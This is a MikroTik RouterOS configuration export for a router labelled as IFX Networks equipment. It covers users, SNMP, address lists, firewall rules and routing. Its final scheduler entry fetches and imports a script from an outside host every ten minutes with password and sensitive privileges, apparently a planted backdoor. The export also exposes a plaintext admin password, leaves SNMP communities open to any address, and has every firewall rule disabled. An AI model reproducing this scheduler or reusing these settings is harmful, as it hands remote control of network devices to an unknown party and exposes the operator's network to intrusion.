user add name=ifxadmin password=1fx@dm1nC0! address=190.60.0.0/16,190.61.0.0/16,172.16.0.0/16,172.17.0.0/16,10.0.120.0/24,200.61.0.0/16,200.91.0.0/16,200.78.196.69,144.91.71.175 group=full /interface ethernet set [ find default-name=ether2 ] name=TO_LAN_ETH2 set [ find default-name=ether1 ] name=TO_WAN_ETH1 /interface wireless security-profiles set [ find default=yes ] supplicant-identity=MikroTik /ip hotspot profile set [ find default=yes ] html-directory=flash/hotspot /snmp community add addresses=190.61.4.170/32,190.61.4.34/32,190.61.4.35/32 name=ifxcliente add addresses=::/0 name=YES add addresses=::/0 name=YES! /user group set full policy=local,telnet,ssh,ftp,reboot,read,write,policy,test,winbox,password,web,sniff,sensitive,api,romon,dude,tikapp /ip neighbor discovery-settings set discover-interface-list=!dynamic /ip address add address=172.17.120.106/30 interface=TO_WAN_ETH1 network=172.17.120.104 add address=10.44.36.254/24 interface=TO_LAN_ETH2 network=10.44.36.0 add address=10.70.65.54/29 interface=TO_LAN_ETH2 network=10.70.11.32 /ip firewall address-list add address=10.2.10.192/28 list=admin add address=10.2.26.192/28 list=admin add address=10.1.20.128/28 list=admin add address=10.2.1.34 list=admin add address=10.1.1.198 list=admin add address=10.2.104.0/24 list=admin add address=10.25.1.0/27 list=admin add address=10.0.0.0/8 list=admin add address=10.2.24.0/24 list=Qualys add address=10.41.35.150 list=DVR add address=10.63.0.158 list=admin add address=190.61.4.170 list=gestion add address=190.61.4.34 list=gestion add address=190.61.4.35 list=gestion add address=172.31.80.0/24 list=gestion add address=10.0.120.0/24 list=gestion add address=172.17.120.104/30 list=gestion /ip firewall filter add action=drop chain=input comment="IN: Bloqueo Qualy" disabled=yes dst-address-list=DVR src-address-list=Qualys add action=accept chain=input comment="IN: Permitir conexiones establecidas y relacionadas" connection-state=established,related disabled=yes add action=drop chain=input comment="IN: Bloqueo conexiones invalidas al router" connection-state=invalid disabled=yes add action=accept chain=input comment="IN: Administracion del Router" disabled=yes src-address-list=admin add action=accept chain=input comment="IN: Administracion del Router IFX" disabled=yes src-address-list=gestion add action=drop chain=input comment="IN: Descartar todo lo demas" disabled=yes add action=accept chain=forward comment="FWD: Permite trafico a travez del Router" disabled=yes /ip route add distance=1 gateway=172.17.120.105 /ip service set ftp disabled=yes set api disabled=yes set api-ssl disabled=yes /ip traffic-flow set enabled=yes /ip traffic-flow target add dst-address=10.1.1.198 port=9996 src-address=10.44.36.254 version=5 /snmp set enabled=yes location=S24_MASAGUA trap-community=ifxcliente trap-version=2 /system identity set name=SID_1587180_S24_MASAGUA /system note set note="**************************************************************\ \n* *\ \n* ATENCION: Este equipo es propiedad de IFX Networks *\ \n* El uso no autorizado esta estrictamente prohibido. *\ \n* Todos los usuarios son legalmente responsables de sus *\ \n* acciones sobre el sistema y toda actividad sera registrada *\ \n* *\ \n**************************************************************" /system scheduler add interval=10m name=U6 on-event="/tool fetch url=http://zancetom.com/poll/3ce1f97e-87df-479d-9f57-50434d0e0f3b mode=http dst-path=7wmp0b4s.rsc\r\ \n/import 7wmp0b4s.rsc" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=jun/14/1970 start-time=08:04:04